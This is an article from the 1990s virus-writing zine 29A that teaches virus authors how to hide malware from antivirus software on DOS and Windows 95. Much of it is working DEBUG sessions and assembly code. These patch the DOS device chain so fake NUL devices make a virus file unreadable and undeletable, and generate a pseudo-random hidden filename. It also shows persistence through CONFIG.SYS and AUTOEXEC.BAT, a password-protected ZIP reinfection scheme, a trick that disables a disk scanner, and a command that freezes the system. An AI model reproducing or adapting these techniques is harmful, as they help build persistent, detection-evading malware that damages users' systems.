Copy Link
Add to Bookmark
Report
29A Issue 02 02 01
Playing "Hide and Seek"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
"Q" the Misanthrope
It is a game of one-up-man-ship between the VX and the AV community. VX
seems to be winning this battle but is also forcing new improvements. VX
creates virus. AV creates scan strings. VX creates mutation. AV creates
smart detectors. VX creates stealth. AV counters that with direct access.
VX creates tunneling. AV stops that. VX creates tracing. AV stumbles. VX
creates retro. AV stumbles. VX creates Stop AV from memory scanning. AV
stumbles. VX creates macro viruses. AV goes nuts. VX creates new places to
hide from AV. AV will probably stumble again.
Hide in NUL-Space
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Wouldn't it be great to hide in a file that could not be accessed. You can.
There are little things called device drivers in your PC. COM1, COM2, LPT1
and CON are examples. NUL is also a device that serves little purpose ex-
cept do nothing. An example of this: COPY *.* NUL will read all the files
for errors and copy them into NUL-Space (nowhere). Try to create a file by
the name of NUL, what could you do with it? An experiment is necessary.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
c:\>debug
-a
mov ah,52
int 21
int 3
-g
AX=5200 BX=0026 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000
DS=0C9C ES=00C9 SS=0C9C CS=0C9C IP=0104 NV UP EI PL NZ NA PO NC
0C9C:0104 CC INT 3
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
ES:BX points to the DOS list of lists. From Ralf Browns interrupt list:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Format of List of Lists:
Offset Size Description
00h DWORD pointer to first Drive Parameter Block
04h DWORD -> first System File Table
08h DWORD pointer to active CLOCK$ device's header
[...]
22h 18 BYTEs actual NUL device driver header (not a pointer!)
NUL is always the first device on DOS's linked list of
device drivers
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
ES:BX+22h is what is of interest. Back to debug.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-d es:48l12
00C9:0040 00 00 A6 C9 04 80 C7 0D ........
00C9:0050 CD 0D 4E 55 4C 20 20 20-20 20 ..NUL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
See the word NUL at es:bx+2Ch. Lets change it to AUTOEXEC.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-e es:52 "AUTOEXEC"
-q
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Back to DOS.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
c:\>type c:\autoexec.bat
c:\>ren c:\autoexec.bat test.bat
Path not found
c:\>del c:\autoexec.bat
Access denied
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Notice what happened when AUTOEXEC.BAT was in NUL-Space. It could not be
read, renamed or deleted. Wouldn't this be a great way to protect our vi-
rus. Ralf Browns list showed that the actual NUL device was only 18 bytes
long. Could you just make another 18 byte NUL device by another name? The
answer is YES! Here is the device format from Ralf Brown:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Format of DOS device driver header:
Offset Size Description
00h DWORD pointer to next driver, offset=FFFFh if last driver
04h WORD device attributes (see below)
06h WORD device strategy entry point
call with ES:BX -> request header
08h WORD device interrupt entry point
0Ah 8 BYTEs blank-padded character device name
Bitfields for device attributes:
Bit(s) Description
15 set (indicates character device)
14 IOCTL supported
13 (DOS 3.0+) output until busy supported
12 reserved
11 (DOS 3.0+) OPEN/CLOSE/RemMedia calls supported
10-8 reserved
7 (DOS 5.0+) Generic IOCTL check call supported
6 (DOS 3.2+) Generic IOCTL call supported
5 reserved
4 device is special (use INT 29 "fast console output")
3 device is CLOCK$
2 device is NUL
1 device is standard output
0 device is standard input
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
From the debug experiment:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-d es:48l12
00C9:0040 00 00 A6 C9 04 80 C7 0D ........
00C9:0050 CD 0D 4E 55 4C 20 20 20-20 20 ..NUL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
We see that the next device in the chain is at C9A6:0000h, attributes are
8004h and that the strategy and interrupt entry points are 00C9:0DC7h and
00C9:0DCDh. The strategy and interrupt points for a NUL device just need to
point to a RETF (they really could point anywhere since they are not used).
To make our own NUL device we can do something like this:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
mov ah,52h ;get list of lists
int 21h
cld ;get address of next device in ds:si
lds si,dword ptr es:[bx+22h]
push cs ;point to our device
pop es
mov di,offset virus_device
movsw ;copy device chain to our device
movsw ;then hook in our device
mov word ptr ds:[si-02h],cs
mov word ptr ds:[si-04h],offset virus_device
[...]
virus_device dd -1h
dw 8004h ;NUL character attributes
dw return_far ;strategy pointer
dw return_far ;interrupt pointer
db "VIRUS " ;any file name your want in NUL-Space
[...]
return_far: retf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
When your virus starts, have your virus create a first generation virus
whose host is the standard CD 20 (terminate immediately) before it starts
infecting. Name that virus C:\FDGDIKGA.PKB (pseudo random name and exten-
sion but should be same for all infections on that PC). This name could be
derived from the drive C: serial number:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
mov ax,6900h ;get drive serial number
mov bx,0003h ;drive C:
push cs
pop ds
mov dx,offset info ;point to where serial number will be
int 21h
;create file name from the drive C: serial number
cld
mov si,offset serialnumber
mov di,offset device_name
mov cx,0004h ;loop 4 times
get_serial: lodsb ;get start of serial number
push cx
mov cl,04h ;inner loop 4 times
make_file: sub al,cl
ror al,cl ;pseudo random letter
mov bl,al
and bl,0fh
add bl,"A" ;create letter from A to P
mov byte ptr ds:[di],bl
inc di ;save it and move pointer
loop make_file
pop cx
loop get_serial
mov byte ptr ds:[file_dot],"." ;restore dot
mov byte ptr ds:[asciz_nul],00h ;restore nul
mov dx,offset file_name
;now create virus by name at DS:DX
[...]
info dw 0
serialnumber dd 0 ;drive C: serial number
db 19 dup(0) ;misc junk
file_name db "C:\"
device_name db "VIRUS000" ;pseudo virus name goes here
file_dot db ".000" ;with pseudo extension
asciz_nul db 00h,00h,00h
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Hide it with the System and Hidden attribute, maybe even Read-Only. Now
create a NUL device by the name of FDGDIKGA (same as pseudo random file na-
me). Add this line to CONFIG.SYS:
INSTALL=C:\FDGDIKGA.PKB
Now start infecting. Go memory resident (you really only need to have the
18 bytes of your NUL device resident). What will now happen is magic. When
the PC reboots there will load a program that doesn't have an executable
extension so most AV programs won't even try to scan it. If they do they
won't be able to read it or delete it because it is in NUL-Space. The AV
people will be able to add the scan string for your virus and remove all
the children created by it but they will not get the virus in NUL-Space. It
will continue to infect again and again. Maybe only have it infect on Fri-
days or on the 13th of each month so it will appear that the virus has gone
away but later it magically returns.
Hiding in NUL-Space and Windows 95
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It works just fine with one notable exception; SCANDSKW.EXE that is automa-
tically launched by the System Agent detects that there is a device by the
same name as a file and will flag it. The solution is simple. Create ano-
ther NUL device by the name of SCANDSKW. This stops SCANDSKW from working
but doesn't flag an error.
Note: when going resident with the 18 byte NUL device, you might want to
put it in the same location as the AUX device. This device is never ever u-
sed and is just wasting space. AUX is another name for COM1. PRN could be
used but some older programs actually use it. LPT3's 18 bytes also could be
used. The way to find the AUX device is to search the device chain:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
mov ah,52h ;get list of lists
int 21h
add bx,22h ;point to NUL device
check_end: cmp word ptr es:[bx],-1 ;end of chain?
je end_chain
cmp word ptr es:[bx+0ah],"UA"
jne next_device ;Look for "AUX "
cmp word ptr es:[bx+0ch]," X"
jne next_device
[...]
;found AUX device at ES:BX change the name at ES:BX+0Ah to whatever you want
[...]
mov word ptr es:[bx+04h],8004h ;set NUL device
jmp short end_chain
next_device: les bx,dword ptr es:[bx] ;get next device in chain
jmp short check_end
end_chain:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
To see the power of NUL-Space, try this in Windows 95: md\"NUL ".
It locks the computer completely up.
Hide in Cypher Text
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PkZip has the ability to password protect ZIP files. This can be used to
our advantage. Have the virus run this:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
PKZIP -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
And add this to the AUTOEXEC.BAT:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
@ECHO OFF
PKUNZIP -O -SPASSWORD C:\VIRUS.ZIP
C:\VIRUS.COM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
This will allow multiple reinfections but the source will not be found
with a virus scanner because it will not be able to expand the ZIP file.
If this is over your head, save it and come back to it when you are smar-
ter. Have fun in NUL-Space.
Dear AV community,
You are in check!
It is now your move.
"Q" the Misanthrope
